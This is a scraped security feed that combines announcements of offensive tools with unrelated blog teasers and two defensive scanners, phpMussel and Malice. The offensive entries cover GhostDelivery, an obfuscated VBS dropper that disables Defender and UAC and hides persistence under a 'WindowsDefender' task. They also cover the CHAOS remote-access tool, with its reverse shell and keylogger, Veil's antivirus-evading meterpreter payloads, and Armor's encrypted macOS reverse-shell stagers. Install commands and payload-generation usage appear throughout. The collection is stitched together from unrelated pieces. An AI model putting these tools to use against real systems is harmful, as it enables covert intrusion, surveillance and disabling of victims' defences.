GhostDelivery – This Tool Creates An Obfuscated .vbs Script To Download A Payload Hosted On A Server To %TEMP% Directory, Execute Payload And Gain Persistence

Python script to generate an obfuscated .vbs script that delivers a payload with persistence and Windows antivirus-disabling functions.

Features:
  Downloads the payload to the TEMP directory and executes it to bypass Windows SmartScreen.
  Disables Defender, UAC (User Account Control) and Defender notifications.
  Injects/creates Command Prompt and Microsoft Edge shortcuts pointing at the payload path (%TEMP%/payload.exe).
  Adds a scheduled task called "WindowsDefender" so the payload is run at login.
  Obfuscates the .vbs delivery script.
  Includes a serveo function to deliver the obfuscated .vbs script.

Light version: the light version is less noisy and only delivers/executes the payload, creates a scheduled task named "WindowsDefender" to run the payload at login for persistence, and injects/creates Command Prompt and Microsoft Edge shortcuts with the payload path.

Prerequisites/requirements: Python 2.7; modules imported in the script (random, sys, string, os, time, base64).

Download GhostDelivery

Link: http://feedproxy.google.com/~r/PentestTools/~3/oWV8asKvS20/ghostdelivery-this-tool-creates.html

A False Sense of Cybersecurity: The Riskiest States in America

Reading Time: ~5 min.

Like many Americans, you might think your online habits are safe enough—or, at least, not so risky as to put you in danger for cybercrime. As it happens, most of us in the U.S. are nowhere near as secure as we think we are. We partnered with Wakefield Research to survey 10,000 Americans, ages 18 […]
The post A False Sense of Cybersecurity: The Riskiest States in America appeared first on Webroot Blog.

Link: https://www.webroot.com/blog/2019/05/07/a-false-sense-of-cybersecurity-the-riskiest-states-in-america/

Getting Past the Hype of Next Generation Endpoint Security

We’ve heard the same story for years. Antivirus software is not effective in stopping cyber-attacks, as hackers have adapted their techniques to evade signature-based detections. Even next-generation antivirus, which applies techniques such as machine learning and behavioral analytics, is no more effective at protecting an organization than its older sibling. But why? The simple […]
The post Getting Past the Hype of Next Generation Endpoint Security appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/lyCbj-Pa38M/

CHAOS Framework v2.0 – Generate Payloads And Control Remote Windows Systems

CHAOS is a PoC that allows generating payloads and controlling remote operating systems.

Features

  Feature         Windows   Mac   Linux
  Reverse Shell      X       X      X
  Download File      X       X      X
  Upload File        X       X      X
  Screenshot         X       X      X
  Keylogger          X
  Persistence        X
  Open URL           X       X      X
  Get OS Info        X       X      X
  Fork Bomb          X       X      X
  Run Hidden         X

Tested On
Kali Linux – ROLLING EDITION

How to Install
# Install dependencies
$ sudo apt install golang git -y
# Get this repository
$ go get github.com/tiagorlampert/CHAOS
# Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
# Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
# It occurs because the libraries are for Windows systems, but they are necessary to build the payload.
# Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
# Run
$ go run main.go

How to Use

  Command (on HOST)     does...
  generate              Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows)
    lhost=                Specify an IP for connection
    lport=                Specify a port for connection
    fname=                Specify a filename to output
    --windows             Target Windows
    --macos               Target Mac OS
    --linux               Target Linux
  listen                Listen for a new connection (e.g. listen lport=8080)
  serve                 Serve files
  exit                  Quit this program

  Command (on TARGET)   does...
  download              File Download
  upload                File Upload
  screenshot            Take a Screenshot
  keylogger_start       Start Keylogger session
  keylogger_show        Show Keylogger session logs
  persistence_enable    Install at Startup
  persistence_disable   Remove from Startup
  getos                 Get OS name
  lockscreen            Lock the OS screen
  openurl               Open the URL informed
  bomb                  Run Fork Bomb
  clear                 Clear the Screen
  back                  Close connection but keep running on target
  exit                  Close connection and exit on target

FAQ

Why does the Keylogger capture all uppercase letters?
All the letters obtained using the keylogger are uppercase letters. It is a known issue; if anyone knows how to fix the Keylogger function using Golang, please contact me or open an issue.

Why is it necessary to get and install external libraries?
To implement the screenshot function I used a third-party library; you can check it at https://github.com/kbinani/screenshot and https://github.com/lxn/win. You must download and install them to generate the payload.

Contact
tiagorlampert@gmail.com

Download CHAOS

Link: http://www.kitploit.com/2019/04/chaos-framework-v20-generate-payloads.html

phpMussel – PHP-based Anti-Virus Anti-Trojan Anti-Malware Solution

phpMussel is an ideal solution for shared hosting environments, where it’s often not possible to utilize or install conventional anti-virus protection solutions. phpMussel is a PHP script designed to detect trojans, viruses, malware and other threats within files uploaded to your system wherever the script is hooked, based on the signatures of ClamAV and others. For information regarding HOW TO INSTALL {2A+2B} and HOW TO USE {3A+3B} phpMussel, please refer either to the Wiki or to the documentation included within the "_docs" directory of this repository (direct links to that documentation are included under the "Documentation" header below this paragraph).

Features:
  Licensed as GNU General Public License version 2.0 (GPLv2).
  Easy to install, easy to customise, easy to use.
  Works for any system with PHP+PCRE installed, regardless of OS (PHP+PCRE required).
  Fully configurable based on your needs.
  Ideal solution for shared hosting services.
  Ideal solution for forum systems in need of file upload protection.
  Does NOT require shell access.
  Does NOT require administrative privileges.
  CLI mode available.
  Good, strong, stable support base.

Documentation:
English, العربية, Deutsch, Español, Français, Bahasa Indonesia, Italiano, 日本語, 한국어, Nederlandse, Português, Русский, اردو, Tiếng Việt, 中文(简体), 中文(傳統)

Download phpMussel

Link: http://feedproxy.google.com/~r/PentestTools/~3/GyXiM5XXkzc/phpmussel-php-based-anti-virus-anti.html

ASUS, Microsoft, & Tesla – Hack Naked News #212

Zero-Days in Counter Strike client could be used to build a major botnet, huge aluminum plants hit by ‘severe’ ransomware attack, Myspace loses 50 million songs in server migration, wifi signals can reveal your password, and PuTTY in your hands: an SSH client gets patched after RSA key exchange memory vulnerability was spotted! […]
The post ASUS, Microsoft, & Tesla – Hack Naked News #212 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/VrsX9vpaVWg/

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice’s mission is to be a free open source version of VirusTotal that anyone can use at any scale, from an independent researcher to a Fortune 500 company.

Try It Out
DEMO: demo.malice.io
username: malice
password: ecilam

Requirements
Hardware: ~16GB disk space, ~4GB RAM
Software: Docker

Getting Started (OSX)

Install
$ brew install maliceio/tap/malice

Usage: malice [OPTIONS] COMMAND [arg...]

Open Source Malware Analysis Framework

Version: 0.3.11
Author: blacktop

Options:
  --debug, -D    Enable debug mode [$MALICE_DEBUG]
  --help, -h     show help
  --version, -v  print the version

Commands:
  scan     Scan a file
  watch    Watch a folder
  lookup   Look up a file hash
  elk      Start an ELK docker container
  plugin   List, Install or Remove Plugins
  help     Shows a list of commands or help for one command

Run 'malice COMMAND --help' for more information on a command.

Scan some malware
$ malice scan evil.malware
NOTE: On the first run malice will download all of its default plugins, which can take a while to complete.
Malice will output the results as a markdown table that can be piped or copied into a results.md that will look great on GitHub.

Start Malice’s Web UI
$ malice elk
You can open the Kibana UI and look at the scan results here: http://localhost (assuming you are using Docker for Mac).
Type in malice as the Index name or pattern and click Create. Now click on the Malice tab and behold!

Getting Started (Docker in Docker)

Install/Update all Plugins
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock malice/engine plugin update --all

Scan a file
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
  -v `pwd`:/malice/samples \
  -e MALICE_VT_API=$MALICE_VT_API \
  malice/engine scan SAMPLE

Documentation: Documentation, Plugins, Examples, Roadmap, Contributing

Download Malice

Link: http://feedproxy.google.com/~r/PentestTools/~3/MYaRxSE3IIE/malice-virustotal-wanna-be-now-with-100.html

The Must-Have Tech Accessory for Students

Reading Time: ~4 min.

We live in a digital age where internet-connected devices are the norm. Our phones, our televisions, even our light bulbs are tied together in today’s tech ecosystem. For high school and college students, this degree of digital connection is the standard, and when school is in session, tech accessories are a popular way to customize […]
The post The Must-Have Tech Accessory for Students appeared first on Webroot Blog.

Link: https://www.webroot.com/blog/2019/01/10/the-must-have-tech-accessory-for-students/

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions. Veil is currently under support by @ChrisTruncer.

Software Requirements:
The following OSs are officially supported:
  Debian 8+
  Kali Linux Rolling 2018.1+
The following OSs are likely able to run Veil:
  Arch Linux
  BlackArch Linux
  Deepin 15+
  Elementary
  Fedora 22+
  Linux Mint
  Parrot Security
  Ubuntu 15.10+

Setup

Kali’s Quick Install
  apt -y install veil
  /usr/share/veil/config/setup.sh --force --silent

Git’s Quick Install
NOTE: Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning. Your package manager may be different to apt.
  sudo apt-get -y install git
  git clone https://github.com/Veil-Framework/Veil.git
  cd Veil/
  ./config/setup.sh --force --silent

./config/setup.sh // Setup Files
This file is responsible for installing all the dependencies of Veil. This includes the whole WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.
It includes two optional flags, --force and --silent:
  --force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.
  --silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.
This can be run either by doing: ./Veil.py --setup OR ./config/setup.sh --force.

./config/update-config.py // Regenerating Configuration file
This will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt, but in some cases you might be prompted to do so (such as a major Veil update).
It is important that you are in the ./config/ directory before executing update-config.py.
If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following:

  Main Menu
      0 payloads loaded

Don’t panic. Run either: ./Veil.py --config OR cd ./config/; ./update-config.py.

Py2Exe
NOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).
MANUALLY install on a Windows computer (as this isn’t done by Veil’s setup):
  Python 3.3
  Py2Exe
  PyCrypto
  PyWin32

Example Usage

Veil’s Main Menu:
$ ./Veil.py
===============================================================================
                             Veil | [Version]: 3.1.6
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit		Completely exit Veil
	info		Information on a specific tool
	list		List available tools
	options		Show Veil configuration
	update		Update Veil
	use		Use a specific tool

Veil>:

Help
$ ./Veil.py --help
usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
               [--version] [--ip IP] [--port PORT] [--list-payloads]
               [-p [PAYLOAD]] [-o OUTPUT-NAME]
               [-c [OPTION=value [OPTION=value ...]]]
               [--msfoptions [OPTION=value [OPTION=value ...]]]
               [--msfvenom ] [--compiler pyinstaller] [--clean]
               [--ordnance-payload PAYLOAD] [--list-encoders] [-e ENCODER]
               [-b \x00\x0a..] [--print-stats]

Veil is a framework containing multiple tools.

[*] Veil Options:
  --list-tools          List Veil’s tools
  -t TOOL, --tool TOOL  Specify Veil tool to use (Evasion, Ordnance etc.)
  --update              Update the Veil framework
  --setup               Run the Veil framework setup file & regenerate the configuration
  --config              Regenerate the Veil framework configuration file
  --version             Displays version and quits

[*] Callback Settings:
  --ip IP, --domain IP  IP address to connect back to
  --port PORT           Port number to connect to

[*] Payload Settings:
  --list-payloads       Lists all available payloads for that tool

[*] Veil-Evasion Options:
  -p [PAYLOAD]          Payload to generate
  -o OUTPUT-NAME        Output file base name for source and compiled binaries
  -c [OPTION=value [OPTION=value ...]]
                        Custom payload module options
  --msfoptions [OPTION=value [OPTION=value ...]]
                        Options for the specified metasploit payload
  --msfvenom []         Metasploit shellcode to generate (e.g. windows/meterpreter/reverse_tcp etc.)
  --compiler pyinstaller
                        Compiler option for payload (currently only needed for Python)
  --clean               Clean out payload folders

[*] Veil-Ordnance Shellcode Options:
  --ordnance-payload PAYLOAD
                        Payload type (bind_tcp, rev_tcp, etc.)

[*] Veil-Ordnance Encoder Options:
  --list-encoders       Lists all available encoders
  -e ENCODER, --encoder ENCODER
                        Name of shellcode encoder to use
  -b \x00\x0a.., --bad-chars \x00\x0a..
                        Bad characters to avoid
  --print-stats         Print information about the encoded shellcode
$

Veil Evasion CLI
$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
sync
io
unicode/utf8
internal/syscall/windows/sysdll
unicode/utf16
syscall
strconv
reflect
encoding/binary
command-line-arguments
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/meterpreter/rev_tcp
 [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
 [*] Source code written to: /var/lib/veil/output/source/payload.go
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
$
$ file /var/lib/veil/output/compiled/payload.exe
/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
$

Veil Ordnance CLI
$ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
===============================================================================
                                  Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Payload Name: Reverse TCP Stager (Stage 1)
 [*] IP Address: 127.0.0.1
 [*] Port: 4444
 [*] Shellcode Size:
287
$

Download Veil

Link: http://www.kitploit.com/2018/12/veil-tool-to-generate-metasploit.html

Armor – Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners

Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Below is an example gif of Armor being used with a simple Netcat payload.

A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook and the attacker’s Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker’s server. When the stager is executed on the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the hard drive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.

Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an example. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.

Installation
Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn’t found on your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.

Armor can be cloned and executed using the below commands.
  git clone https://github.com/tokyoneon/Armor
  cd Armor/
  chmod +x armor.sh
  ./armor.sh /path/to/payload.txt 1.2.3.4 443

The 1.2.3.4 address is the attacker’s IP address where the decryption key will be hosted. This can be a local IP address or a VPS. The port number (443) is arbitrary and can be changed as needed.

Questions and concerns:
Twitter: @tokyoneon_
WonderHowTo: https://creator.wonderhowto.com/tokyoneon/
Email: dG9reW9uZW9uQHBtLm1lCg==

Download Armor

Link: http://feedproxy.google.com/~r/PentestTools/~3/KyKciqnowOA/armor-tool-designed-to-create-encrypted.html